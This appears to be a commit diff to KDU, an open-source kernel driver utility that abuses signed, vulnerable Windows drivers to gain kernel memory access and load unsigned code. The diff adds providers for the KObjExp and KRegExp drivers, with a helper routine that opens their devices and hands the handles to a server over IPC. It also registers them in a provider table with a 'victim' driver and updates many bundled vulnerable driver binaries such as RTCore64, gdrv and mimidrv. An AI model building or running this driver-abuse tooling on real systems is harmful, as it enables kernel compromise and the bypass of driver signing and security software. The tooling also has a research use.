--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -6,7 +6,7 @@
*
* VERSION: 1.32
*
-* DATE: 20 May 2023
+* DATE: 10 Jun 2023
*
* Global consts.
*
@@ -27,10 +27,13 @@
#define KDU_MIN_NTBUILDNUMBER 0x1DB1 //Windows 7 SP1
#define KDU_MAX_NTBUILDNUMBER 0xFFFFFFFF //Undefined
+#define IPC_GET_HANDLE 0x1337
+
#define KDU_SYNC_MUTANT 0x2306
#define NT_REG_PREP L"\\Registry\\Machine"
#define DRIVER_REGKEY L"%wS\\System\\CurrentControlSet\\Services\\%wS"
+#define WDAC_POLICY_FILE L"\\systemroot\\system32\\CodeIntegrity\\driversipolicy.p7b"
#define PROCEXP152 L"PROCEXP152"
#define PROCEXP1627_DESC L"Process Explorer v16"
@@ -48,6 +51,9 @@
#define PHYMEM_BASE_DESC "PhyMem by akui"
#define RWEVERYTHING_BASE_DESC "RWEverything by ckimchan.tw"
+#define ZODIACON_SYSEXP_EXE L"SysExp.exe"
+#define ZODIACON_REGEXP_EXE L"RegExp.exe"
+
#define CPU_VENDOR_INTEL "GenuineIntel"
#define CPU_VENDOR_INTEL_LENGTH sizeof(CPU_VENDOR_INTEL) - sizeof(CHAR)
#define CPU_VENDOR_AMD "AuthenticAMD"
@@ -132,8 +138,8 @@
#define IDR_MSI_WINIO 137
#define IDR_HP_ETDSUPP 138
#define IDR_KEXPLORE 139
-#define IDR_RESERVED6 140
-#define IDR_RESERVED7 141
+#define IDR_KOBJEXP 140
+#define IDR_KREGEXP 141
#define IDR_RESERVED8 142
//
@@ -176,6 +182,8 @@
#define KDU_PROVIDER_MSI_WINIO 34
#define KDU_PROVIDER_HP_ETDSUPPORT 35
#define KDU_PROVIDER_KEXPLORE 36
+#define KDU_PROVIDER_KOBJEXP 37
+#define KDU_PROVIDER_KREGEXP 38
#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
diff --git a/Source/Shared/ldr/ldr.cpp b/Source/Shared/ldr/ldr.cpp
index 6cea8c3..03c6fc9 100644
--- a/Source/Shared/ldr/ldr.cpp
+++ b/Source/Shared/ldr/ldr.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: LDR.CPP
*
-* VERSION: 1.13
+* VERSION: 1.14
*
-* DATE: 05 Feb 2022
+* DATE: 10 Jun 2023
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -122,41 +122,56 @@ LPVOID PELoaderGetProcAddress(
_In_ PCHAR RoutineName
)
{
- PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
- PIMAGE_FILE_HEADER fh1 = NULL;
- PIMAGE_OPTIONAL_HEADER32 oh32 = NULL;
- PIMAGE_OPTIONAL_HEADER64 oh64 = NULL;
-
- USHORT OrdinalNumber;
- PULONG NameTableBase;
- PUSHORT NameOrdinalTableBase;
- PULONG Addr;
- LONG Result;
- ULONG High, Low, Middle = 0;
-
- fh1 = (PIMAGE_FILE_HEADER)((ULONG_PTR)ImageBase + ((PIMAGE_DOS_HEADER)ImageBase)->e_lfanew + sizeof(DWORD));
- oh32 = (PIMAGE_OPTIONAL_HEADER32)((ULONG_PTR)fh1 + sizeof(IMAGE_FILE_HEADER));
- oh64 = (PIMAGE_OPTIONAL_HEADER64)oh32;
-
- if (fh1->Machine == IMAGE_FILE_MACHINE_AMD64) {
- ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)ImageBase +
- oh64->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+ PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
+ USHORT OrdinalNumber;
+ PULONG NameTableBase;
+ PUSHORT NameOrdinalTableBase;
+ PULONG Addr;
+ LONG Result;
+ ULONG High, Low, Middle = 0;
+
+ union {
+ PIMAGE_NT_HEADERS64 nt64;
+ PIMAGE_NT_HEADERS32 nt32;
+ PIMAGE_NT_HEADERS nt;
+ } NtHeaders;
+
+ NtHeaders.nt = RtlImageNtHeader(ImageBase);
+
+ if (NtHeaders.nt == NULL) {
+ SetLastError((DWORD)STATUS_ACCESS_VIOLATION);
+ return NULL;
+ }
+
+ if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) {
+
+ ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)RtlOffsetToPointer(ImageBase,
+ NtHeaders.nt64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+
+ }
+ else if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) {
+
+ ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)RtlOffsetToPointer(ImageBase,
+ NtHeaders.nt32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
}
- else {
- ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)ImageBase +
- oh32->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
+ else
+ {
+ SetLastError(ERROR_UNSUPPORTED_TYPE);
+ return NULL;
}
- NameTableBase = (PULONG)((PBYTE)ImageBase + (ULONG)ExportDirectory->AddressOfNames);
- NameOrdinalTableBase = (PUSHORT)((PBYTE)ImageBase + (ULONG)ExportDirectory->AddressOfNameOrdinals);
+ NameTableBase = (PULONG)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNames);
+ NameOrdinalTableBase = (PUSHORT)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNameOrdinals);
Low = 0;
High = ExportDirectory->NumberOfNames - 1;
while (High >= Low) {
+
Middle = (Low + High) >> 1;
+
Result = _strcmp_a(
RoutineName,
- (char*)ImageBase + NameTableBase[Middle]
- );
+ (char*)RtlOffsetToPointer(ImageBase, NameTableBase[Middle]));
+
if (Result < 0) {
High = Middle - 1;
}
@@ -168,7 +183,7 @@ LPVOID PELoaderGetProcAddress(
break;
}
}
- } //while
+ }
if (High < Low)
return NULL;
@@ -176,6 +191,6 @@ LPVOID PELoaderGetProcAddress(
if ((ULONG)OrdinalNumber >= ExportDirectory->NumberOfFunctions)
return NULL;
- Addr = (PULONG)((PBYTE)ImageBase + (ULONG)ExportDirectory->AddressOfFunctions);
- return (LPVOID)((PBYTE)ImageBase + Addr[OrdinalNumber]);
+ Addr = (PULONG)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfFunctions);
+ return (LPVOID)RtlOffsetToPointer(ImageBase, Addr[OrdinalNumber]);
}
diff --git a/Source/Taigei/Taigei.vcxproj b/Source/Taigei/Taigei.vcxproj
index 6ae0f5c..5fa8fbf 100644
--- a/Source/Taigei/Taigei.vcxproj
+++ b/Source/Taigei/Taigei.vcxproj
@@ -323,6 +323,7 @@
+
diff --git a/Source/Taigei/Taigei.vcxproj.filters b/Source/Taigei/Taigei.vcxproj.filters
index a3c89b0..a24223e 100644
--- a/Source/Taigei/Taigei.vcxproj.filters
+++ b/Source/Taigei/Taigei.vcxproj.filters
@@ -45,6 +45,9 @@
Source Files
+
+ minirtl
+
diff --git a/Source/Taigei/export.def b/Source/Taigei/export.def
index ca66226..f6c8b04 100644
--- a/Source/Taigei/export.def
+++ b/Source/Taigei/export.def
@@ -8,3 +8,4 @@ SB_SMS_WriteBlockEx = StubFunc
SB_SMS_GetCtrlCountEx = StubFunc
SB_SMS_QuickCommandEx = StubFunc
RegisterForProvider = UnlockAsIO
+RegisterForProvider2 = ExecutableMain
diff --git a/Source/Taigei/ipc.cpp b/Source/Taigei/ipc.cpp
index 92a0dd5..8a34691 100644
--- a/Source/Taigei/ipc.cpp
+++ b/Source/Taigei/ipc.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: IPC.CPP
*
-* VERSION: 1.20
+* VERSION: 1.21
*
-* DATE: 10 Feb 2022
+* DATE: 10 Jun 2023
*
* Inter-process communication.
*
@@ -19,7 +19,7 @@
#include "global.h"
-#define DBK_GET_HANDLE 0x1337
+#define IPC_GET_HANDLE 0x1337
NTSTATUS IpcConnectToPort(
_In_ LPCWSTR PortName,
@@ -102,7 +102,7 @@ VOID IpcSendHandleToServer(
if (NT_SUCCESS(ntStatus)) {
ntStatus = IpcSendReply(portHandle,
- DBK_GET_HANDLE,
+ IPC_GET_HANDLE,
(ULONG64)ProcessHandle,
sizeof(ProcessHandle),
STATUS_SECRET_TOO_LONG);
diff --git a/Source/Taigei/main.cpp b/Source/Taigei/main.cpp
index 2e7207a..fbe403a 100644
--- a/Source/Taigei/main.cpp
+++ b/Source/Taigei/main.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.20
+* VERSION: 1.21
*
-* DATE: 10 Feb 2022
+* DATE: 10 June 2023
*
* Taigei helper dll (part of KDU project).
*
@@ -34,6 +34,92 @@ VOID WINAPI StubFunc(
}
+#define ZODIACON_KOBJEXP L"\\Device\\KObjExp"
+#define ZODIACON_KREGEXP L"\\Device\\KRegExp"
+
+/*
+* ExecutableMain
+*
+* Purpose:
+*
+* Entry point for exe mode.
+*
+*/
+int ExecutableMain()
+{
+#define EXPORT
+
+ LPWSTR* lpszArgList;
+ LPWSTR lpTargetDevice;
+ ULONG ulKey = 0;
+ INT nArgs = 0;
+
+ lpszArgList = CommandLineToArgvW(GetCommandLineW(), &nArgs);
+ if (lpszArgList) {
+
+ if (nArgs > 0) {
+
+ ulKey = _strtoul(lpszArgList[0]);
+
+ switch (ulKey) {
+ case 1:
+ lpTargetDevice = (LPWSTR)ZODIACON_KREGEXP;
+ break;
+ case 0:
+ default:
+ lpTargetDevice = (LPWSTR)ZODIACON_KOBJEXP;
+ break;
+ }
+
+ HANDLE deviceHandle;
+ NTSTATUS ntStatus;
+ UNICODE_STRING deviceName;
+ IO_STATUS_BLOCK ioStatusBlock;
+ OBJECT_ATTRIBUTES objectAttributes;
+ LARGE_INTEGER liTimeOut;
+
+ RtlInitUnicodeString(&deviceName, lpTargetDevice);
+ InitializeObjectAttributes(&objectAttributes, &deviceName, OBJ_CASE_INSENSITIVE, NULL, NULL);
+
+ ntStatus = NtCreateFile(&deviceHandle,
+ GENERIC_READ | GENERIC_WRITE,
+ &objectAttributes,
+ &ioStatusBlock,
+ NULL,
+ 0,
+ 0,
+ FILE_OPEN,
+ 0,
+ NULL,
+ 0);
+
+ if (NT_SUCCESS(ntStatus)) {
+
+ IpcSendHandleToServer(deviceHandle);
+
+ liTimeOut.QuadPart = UInt32x32To64(3000, 10000);
+ liTimeOut.QuadPart *= -1;
+
+ //
+ // Infinite loop.
+ //
+ while (TRUE) {
+ NtDelayExecution(0, (PLARGE_INTEGER)&liTimeOut);
+ }
+
+ ///
+ // Never here.
+ //
+ }
+
+ }
+
+ LocalFree((HLOCAL)lpszArgList);
+ }
+
+ ExitProcess(0);
+}
+
#ifdef _WIN64
/*
diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj
index 85b8fe7..ba9842c 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj
+++ b/Source/Tanikaze/Tanikaze.vcxproj
@@ -207,7 +207,9 @@
+
+
diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters
index bc347af..e5ae477 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj.filters
+++ b/Source/Tanikaze/Tanikaze.vcxproj.filters
@@ -169,6 +169,12 @@
Resource Files
+
+ Resource Files
+
+
+ Resource Files
+
diff --git a/Source/Tanikaze/data/AsusCertService.bin b/Source/Tanikaze/data/AsusCertService.bin
index 21b4ba3..4d5f0cb 100644
Binary files a/Source/Tanikaze/data/AsusCertService.bin and b/Source/Tanikaze/data/AsusCertService.bin differ
diff --git a/Source/Tanikaze/data/KMUEXE.bin b/Source/Tanikaze/data/KMUEXE.bin
index 195ca5b..0089059 100644
Binary files a/Source/Tanikaze/data/KMUEXE.bin and b/Source/Tanikaze/data/KMUEXE.bin differ
diff --git a/Source/Tanikaze/data/KMUSIG.bin b/Source/Tanikaze/data/KMUSIG.bin
index caae920..dbc0ed2 100644
Binary files a/Source/Tanikaze/data/KMUSIG.bin and b/Source/Tanikaze/data/KMUSIG.bin differ
diff --git a/Source/Tanikaze/data/dbutilcat.bin b/Source/Tanikaze/data/dbutilcat.bin
index 01239dc..4cfddfd 100644
Binary files a/Source/Tanikaze/data/dbutilcat.bin and b/Source/Tanikaze/data/dbutilcat.bin differ
diff --git a/Source/Tanikaze/data/dbutilinf.bin b/Source/Tanikaze/data/dbutilinf.bin
index d39250c..1d88ce3 100644
Binary files a/Source/Tanikaze/data/dbutilinf.bin and b/Source/Tanikaze/data/dbutilinf.bin differ
diff --git a/Source/Tanikaze/drv/ALSysIO64.bin b/Source/Tanikaze/drv/ALSysIO64.bin
index 0bc87e7..6df9520 100644
Binary files a/Source/Tanikaze/drv/ALSysIO64.bin and b/Source/Tanikaze/drv/ALSysIO64.bin differ
diff --git a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin
index dfc715f..6e44f07 100644
Binary files a/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin and b/Source/Tanikaze/drv/AMDRyzenMasterDriver.bin differ
diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin
index fc895f4..942f0bb 100644
Binary files a/Source/Tanikaze/drv/ATSZIO64.bin and b/Source/Tanikaze/drv/ATSZIO64.bin differ
diff --git a/Source/Tanikaze/drv/AsIO3.bin b/Source/Tanikaze/drv/AsIO3.bin
index 58a373e..3462c9c 100644
Binary files a/Source/Tanikaze/drv/AsIO3.bin and b/Source/Tanikaze/drv/AsIO3.bin differ
diff --git a/Source/Tanikaze/drv/AsrDrv106.bin b/Source/Tanikaze/drv/AsrDrv106.bin
index ad77473..1f8c071 100644
Binary files a/Source/Tanikaze/drv/AsrDrv106.bin and b/Source/Tanikaze/drv/AsrDrv106.bin differ
diff --git a/Source/Tanikaze/drv/DbUtil2_3.bin b/Source/Tanikaze/drv/DbUtil2_3.bin
index d97a98c..36b378d 100644
Binary files a/Source/Tanikaze/drv/DbUtil2_3.bin and b/Source/Tanikaze/drv/DbUtil2_3.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64.bin b/Source/Tanikaze/drv/DirectIo64.bin
index 7f9abed..f2696d9 100644
Binary files a/Source/Tanikaze/drv/DirectIo64.bin and b/Source/Tanikaze/drv/DirectIo64.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64_2.bin b/Source/Tanikaze/drv/DirectIo64_2.bin
index 96786e2..ee1bc1e 100644
Binary files a/Source/Tanikaze/drv/DirectIo64_2.bin and b/Source/Tanikaze/drv/DirectIo64_2.bin differ
diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin
index 7bc2f3a..b561c00 100644
Binary files a/Source/Tanikaze/drv/EneIo64.bin and b/Source/Tanikaze/drv/EneIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin
index 5371cbe..c1333c8 100644
Binary files a/Source/Tanikaze/drv/EneTechIo64.bin and b/Source/Tanikaze/drv/EneTechIo64.bin differ
diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin
index 2dbe113..1e37369 100644
Binary files a/Source/Tanikaze/drv/GLCKIO2.bin and b/Source/Tanikaze/drv/GLCKIO2.bin differ
diff --git a/Source/Tanikaze/drv/HW64.bin b/Source/Tanikaze/drv/HW64.bin
index 4db3af4..c783c14 100644
Binary files a/Source/Tanikaze/drv/HW64.bin and b/Source/Tanikaze/drv/HW64.bin differ
diff --git a/Source/Tanikaze/drv/KExplore.bin b/Source/Tanikaze/drv/KExplore.bin
index 00f1678..c298cce 100644
Binary files a/Source/Tanikaze/drv/KExplore.bin and b/Source/Tanikaze/drv/KExplore.bin differ
diff --git a/Source/Tanikaze/drv/KObjExp.bin b/Source/Tanikaze/drv/KObjExp.bin
new file mode 100644
index 0000000..cc8cbda
Binary files /dev/null and b/Source/Tanikaze/drv/KObjExp.bin differ
diff --git a/Source/Tanikaze/drv/KRegExp.bin b/Source/Tanikaze/drv/KRegExp.bin
new file mode 100644
index 0000000..b7ebf22
Binary files /dev/null and b/Source/Tanikaze/drv/KRegExp.bin differ
diff --git a/Source/Tanikaze/drv/LDD.bin b/Source/Tanikaze/drv/LDD.bin
index 6e2f2c1..ce2f580 100644
Binary files a/Source/Tanikaze/drv/LDD.bin and b/Source/Tanikaze/drv/LDD.bin differ
diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin
index a15e6f2..8ef38b5 100644
Binary files a/Source/Tanikaze/drv/MsIo64.bin and b/Source/Tanikaze/drv/MsIo64.bin differ
diff --git a/Source/Tanikaze/drv/Phymemx64.bin b/Source/Tanikaze/drv/Phymemx64.bin
index d6301dd..51f97a9 100644
Binary files a/Source/Tanikaze/drv/Phymemx64.bin and b/Source/Tanikaze/drv/Phymemx64.bin differ
diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin
index 4492206..934d009 100644
Binary files a/Source/Tanikaze/drv/RTCore64.bin and b/Source/Tanikaze/drv/RTCore64.bin differ
diff --git a/Source/Tanikaze/drv/SysDrv3S.bin b/Source/Tanikaze/drv/SysDrv3S.bin
index 9021015..235e7a6 100644
Binary files a/Source/Tanikaze/drv/SysDrv3S.bin and b/Source/Tanikaze/drv/SysDrv3S.bin differ
diff --git a/Source/Tanikaze/drv/WinRing0x64.bin b/Source/Tanikaze/drv/WinRing0x64.bin
index 96edd16..af1b85a 100644
Binary files a/Source/Tanikaze/drv/WinRing0x64.bin and b/Source/Tanikaze/drv/WinRing0x64.bin differ
diff --git a/Source/Tanikaze/drv/amsdk.bin b/Source/Tanikaze/drv/amsdk.bin
index 6a3d851..50c4862 100644
Binary files a/Source/Tanikaze/drv/amsdk.bin and b/Source/Tanikaze/drv/amsdk.bin differ
diff --git a/Source/Tanikaze/drv/asio2.bin b/Source/Tanikaze/drv/asio2.bin
index 38ead54..cd40a20 100644
Binary files a/Source/Tanikaze/drv/asio2.bin and b/Source/Tanikaze/drv/asio2.bin differ
diff --git a/Source/Tanikaze/drv/dbk64.bin b/Source/Tanikaze/drv/dbk64.bin
index 0b4a3e9..c5c7477 100644
Binary files a/Source/Tanikaze/drv/dbk64.bin and b/Source/Tanikaze/drv/dbk64.bin differ
diff --git a/Source/Tanikaze/drv/dbutildrv2.bin b/Source/Tanikaze/drv/dbutildrv2.bin
index 6850e7c..1c863f5 100644
Binary files a/Source/Tanikaze/drv/dbutildrv2.bin and b/Source/Tanikaze/drv/dbutildrv2.bin differ
diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin
index fbf6832..6ec1e62 100644
Binary files a/Source/Tanikaze/drv/ene2.bin and b/Source/Tanikaze/drv/ene2.bin differ
diff --git a/Source/Tanikaze/drv/etdsupp.bin b/Source/Tanikaze/drv/etdsupp.bin
index dc74968..8c408cd 100644
Binary files a/Source/Tanikaze/drv/etdsupp.bin and b/Source/Tanikaze/drv/etdsupp.bin differ
diff --git a/Source/Tanikaze/drv/gdrv.bin b/Source/Tanikaze/drv/gdrv.bin
index 78726b3..b456a6f 100644
Binary files a/Source/Tanikaze/drv/gdrv.bin and b/Source/Tanikaze/drv/gdrv.bin differ
diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin
index 9ab9a30..782e357 100644
Binary files a/Source/Tanikaze/drv/gmerdrv.bin and b/Source/Tanikaze/drv/gmerdrv.bin differ
diff --git a/Source/Tanikaze/drv/heavenluo.bin b/Source/Tanikaze/drv/heavenluo.bin
index e54f936..80eaf49 100644
Binary files a/Source/Tanikaze/drv/heavenluo.bin and b/Source/Tanikaze/drv/heavenluo.bin differ
diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin
index 610d2e7..a493f01 100644
Binary files a/Source/Tanikaze/drv/iQVM64.bin and b/Source/Tanikaze/drv/iQVM64.bin differ
diff --git a/Source/Tanikaze/drv/inpoutx64.bin b/Source/Tanikaze/drv/inpoutx64.bin
index a3056d7..896ff00 100644
Binary files a/Source/Tanikaze/drv/inpoutx64.bin and b/Source/Tanikaze/drv/inpoutx64.bin differ
diff --git a/Source/Tanikaze/drv/kprocesshacker.bin b/Source/Tanikaze/drv/kprocesshacker.bin
index e917666..70fedb4 100644
Binary files a/Source/Tanikaze/drv/kprocesshacker.bin and b/Source/Tanikaze/drv/kprocesshacker.bin differ
diff --git a/Source/Tanikaze/drv/lha.bin b/Source/Tanikaze/drv/lha.bin
index 44fb460..3420a9e 100644
Binary files a/Source/Tanikaze/drv/lha.bin and b/Source/Tanikaze/drv/lha.bin differ
diff --git a/Source/Tanikaze/drv/mimidrv.bin b/Source/Tanikaze/drv/mimidrv.bin
index ce7ab69..85fe6b7 100644
Binary files a/Source/Tanikaze/drv/mimidrv.bin and b/Source/Tanikaze/drv/mimidrv.bin differ
diff --git a/Source/Tanikaze/drv/pcdsrvc_x64.bin b/Source/Tanikaze/drv/pcdsrvc_x64.bin
index c709d65..55cfd2e 100644
Binary files a/Source/Tanikaze/drv/pcdsrvc_x64.bin and b/Source/Tanikaze/drv/pcdsrvc_x64.bin differ
diff --git a/Source/Tanikaze/drv/physmem.bin b/Source/Tanikaze/drv/physmem.bin
index adc800b..d8c5c9d 100644
Binary files a/Source/Tanikaze/drv/physmem.bin and b/Source/Tanikaze/drv/physmem.bin differ
diff --git a/Source/Tanikaze/drv/procexp1627.bin b/Source/Tanikaze/drv/procexp1627.bin
index 0caef07..ecc7c6e 100644
Binary files a/Source/Tanikaze/drv/procexp1627.bin and b/Source/Tanikaze/drv/procexp1627.bin differ
diff --git a/Source/Tanikaze/drv/procexp1702.bin b/Source/Tanikaze/drv/procexp1702.bin
index be37ca0..1c19034 100644
Binary files a/Source/Tanikaze/drv/procexp1702.bin and b/Source/Tanikaze/drv/procexp1702.bin differ
diff --git a/Source/Tanikaze/drv/rtkio64.bin b/Source/Tanikaze/drv/rtkio64.bin
index 66f4b16..4550290 100644
Binary files a/Source/Tanikaze/drv/rtkio64.bin and b/Source/Tanikaze/drv/rtkio64.bin differ
diff --git a/Source/Tanikaze/resource.h b/Source/Tanikaze/resource.h
index 91bffd4..f6ad603 100644
--- a/Source/Tanikaze/resource.h
+++ b/Source/Tanikaze/resource.h
@@ -38,6 +38,8 @@
#define IDR_MSI_WINIO 137
#define IDR_HP_ETDSUPP 138
#define IDR_KEXPLORE 139
+#define IDR_KOBJEXP 140
+#define IDR_KREGEXP 141
#define IDR_DATA_DBUTILCAT 1000
#define IDR_DATA_DBUTILINF 1001
#define IDR_DATA_KMUEXE 1002
@@ -50,7 +52,7 @@
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 140
+#define _APS_NEXT_RESOURCE_VALUE 142
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1007
#define _APS_NEXT_SYMED_VALUE 101
diff --git a/Source/Tanikaze/resource.rc b/Source/Tanikaze/resource.rc
index a6bc7ae..868a769 100644
--- a/Source/Tanikaze/resource.rc
+++ b/Source/Tanikaze/resource.rc
@@ -136,6 +136,10 @@ IDR_HP_ETDSUPP RCDATA "drv\\etdsupp.bin"
IDR_KEXPLORE RCDATA "drv\\KExplore.bin"
+IDR_KOBJEXP RCDATA "drv\\KObjExp.bin"
+
+IDR_KREGEXP RCDATA "drv\\KRegExp.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
@@ -143,8 +147,8 @@ IDR_KEXPLORE RCDATA "drv\\KExplore.bin"
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,1,4,2306
- PRODUCTVERSION 1,1,4,2306
+ FILEVERSION 1,1,5,2306
+ PRODUCTVERSION 1,1,5,2306
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -161,12 +165,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility Database"
- VALUE "FileVersion", "1.1.4.2306"
+ VALUE "FileVersion", "1.1.5.2306"
VALUE "InternalName", "Tanikaze.dll"
VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Tanikaze.dll"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.1.4.2306"
+ VALUE "ProductVersion", "1.1.5.2306"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Tanikaze/tanikaze.h b/Source/Tanikaze/tanikaze.h
index 5ed852e..d0787db 100644
--- a/Source/Tanikaze/tanikaze.h
+++ b/Source/Tanikaze/tanikaze.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.13
+* VERSION: 1.14
*
-* DATE: 20 May 2023
+* DATE: 10 Jun 2023
*
* Tanikaze helper dll (part of KDU project).
*
@@ -578,7 +578,37 @@ KDU_DB_ENTRY gProvEntry[] = {
(LPWSTR)L"KExplore",
(LPWSTR)L"KExplore",
(LPWSTR)L"Pavel Yosifovich"
- }
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ NT_WIN10_22H2,
+ IDR_KOBJEXP,
+ KDU_PROVIDER_KOBJEXP,
+ KDU_VICTIM_PE1702,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_PREFER_PHYSICAL,
+ KDUPROV_SC_ALL_DEFAULT,
+ (LPWSTR)L"Kernel Object Explorer Driver",
+ (LPWSTR)L"KObjExp",
+ (LPWSTR)L"KObjExp",
+ (LPWSTR)L"Pavel Yosifovich"
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ NT_WIN10_22H2,
+ IDR_KREGEXP,
+ KDU_PROVIDER_KREGEXP,
+ KDU_VICTIM_PE1702,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_PREFER_PHYSICAL,
+ KDUPROV_SC_ALL_DEFAULT,
+ (LPWSTR)L"Kernel Registry Explorer Driver",
+ (LPWSTR)L"KRegExp",
+ (LPWSTR)L"KRegExp",
+ (LPWSTR)L"Pavel Yosifovich"
+ }
};